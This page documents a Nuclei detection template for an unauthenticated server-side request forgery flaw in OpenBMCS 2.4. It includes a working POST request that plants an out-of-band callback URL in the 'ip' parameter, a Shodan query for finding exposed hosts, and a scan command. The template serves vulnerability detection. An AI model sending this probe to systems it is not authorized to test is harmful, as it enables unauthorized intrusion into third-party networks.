Skip to content

OpenBMCS 2.4 - Server-Side Request Forgery / Remote File Inclusion

ID: openbmcs-ssrf

Severity: medium

Author: dhiyaneshDK

Tags: ssrf,oast,openbmcs,edb,misconfig

OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter ‘ip’ to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.

id: openbmcs-ssrf
info:
name: OpenBMCS 2.4 - Server-Side Request Forgery / Remote File Inclusion
author: dhiyaneshDK
severity: medium
description: OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.
reference:
- https://www.exploit-db.com/exploits/50670
- https://securityforeveryone.com/tools/openbmcs-unauth-ssrf-rfi-vulnerability-scanner
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 6.8
cwe-id: CWE-918
metadata:
max-request: 1
shodan-query: http.favicon.hash:1550906681
tags: ssrf,oast,openbmcs,edb,misconfig
http:
- raw:
- |
POST /php/query.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
ip={{interactsh-url}}:80&argu=/
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
- type: status
status:
- 302
# digest: 490a0046304402205155d95257b9c18693f3de6fccafad786fdbe03a9942202d2ec16a4a4c52cfb002204fed2d95c0f6f82a6f73210e7279aff69284f3e7079c9906bd3b61735bcbb9ae:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/misconfiguration/openbmcs/openbmcs-ssrf.yaml"

View on Github